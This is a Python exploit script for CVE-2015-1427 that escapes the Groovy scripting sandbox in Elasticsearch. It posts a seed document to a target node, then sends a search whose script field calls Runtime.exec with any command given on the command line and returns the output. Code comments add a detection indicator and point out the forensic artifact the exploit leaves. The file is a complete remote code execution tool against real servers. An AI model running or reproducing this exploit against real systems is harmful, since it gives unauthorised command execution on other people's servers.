import json
import sys
import time

import requests
# Elasticsearch remote code execution via Groovy dynamic scripting.
# The payload is the java.lang.Math.class.forName("java.lang.Runtime")
# sandbox bypass (CVE-2015-1427, Elasticsearch 1.3.x/1.4.x with dynamic
# scripting enabled). Commands run as the Elasticsearch service user --
# not necessarily root -- and only stdout is returned, not a shell.
# Defenders: a _search body with script_fields, "lang": "groovy" and
# forName/Runtime in the script text is the indicator to alert on.
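def _groovy_string(text):
	"""Return *text* as a single-quoted Groovy string literal.

	Single quotes are used deliberately: unlike double-quoted GStrings they
	do not interpolate ``$``, so only backslash and the quote itself need
	escaping and the command cannot break out of the literal.
	"""
	return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"


def attack(host, cmd, timeout=10):
	"""Run *cmd* on a vulnerable Elasticsearch node and return its stdout.

	A ``script_fields`` entry is evaluated once per search hit; the Groovy
	script escapes the sandbox via ``java.lang.Math.class.forName`` to reach
	``Runtime.exec`` and hands the process output back as the field value.

	Args:
		host: ``host:port`` of the Elasticsearch HTTP endpoint, no scheme.
		cmd: Command line passed to ``Runtime.exec(String)``. The JVM splits
			it on whitespace itself; no shell is involved, so pipes,
			redirects and quoting are not interpreted.
		timeout: Seconds to wait on each HTTP request so a filtered port
			does not hang the caller indefinitely.

	Returns:
		The command's stdout with a single trailing newline removed.

	Raises:
		RuntimeError: the search response is an Elasticsearch error or has
			no hit carrying the script field (scripting disabled, target not
			vulnerable, or the seed document not yet searchable).
		requests.RequestException: connection or timeout failure.
		ValueError: the response body is not JSON.
	"""
	base = "http://" + host

	# script_fields only produce output for hits, so the index must hold at
	# least one document. NOTE: this seed leaves an artifact on the target
	# (index "website", type "blog", {"name": "test"}) that forensics will find.
	requests.post(base + "/website/blog", json={"name": "test"}, timeout=timeout)
	# Best-effort wait for the near-real-time refresh to make the seed doc
	# searchable; the default refresh interval is about 1s, so this can race.
	time.sleep(0.7)

	# Build the Groovy source with the command as an escaped literal, then let
	# json.dumps (via requests' json=) do the JSON escaping. String-splicing
	# cmd into a hand-written JSON body, as before, broke on quotes and
	# backslashes in the command.
	groovy = (
		'java.lang.Math.class.forName("java.lang.Runtime").getRuntime()'
		".exec(" + _groovy_string(cmd) + ").getText()"
	)
	body = {
		"size": 1,
		"script_fields": {
			"lupin": {"lang": "groovy", "script": groovy},
		},
	}
	r = requests.post(base + "/_search?pretty", json=body, timeout=timeout)
	j = r.json()

	# Surface the server's own message instead of an AttributeError on None.
	if "error" in j:
		raise RuntimeError("Elasticsearch rejected the search: {0}".format(j["error"]))
	hits = j.get("hits", {}).get("hits", [])
	if not hits or "fields" not in hits[0] or "lupin" not in hits[0]["fields"]:
		raise RuntimeError(
			"no hit with the script field returned; scripting is probably "
			"disabled or the target is not vulnerable"
		)

	# The script field comes back as a one-element list holding getText().
	output = hits[0]["fields"]["lupin"][0]
	# Strip only a trailing newline; the old unconditional [:-1] ate the last
	# character of any output that did not end with one.
	if output.endswith("\n"):
		output = output[:-1]
	return output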


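if __name__ == '__main__':
	# Usage: script.py [host:port] [command ...]
	# With no arguments this is the original smoke test against a local node;
	# extra arguments are joined with spaces and passed through unchanged.
	target = sys.argv[1] if len(sys.argv) > 1 else "localhost:9200"
	command = " ".join(sys.argv[2:]) if len(sys.argv) > 2 else "id"
	print(attack(target, command))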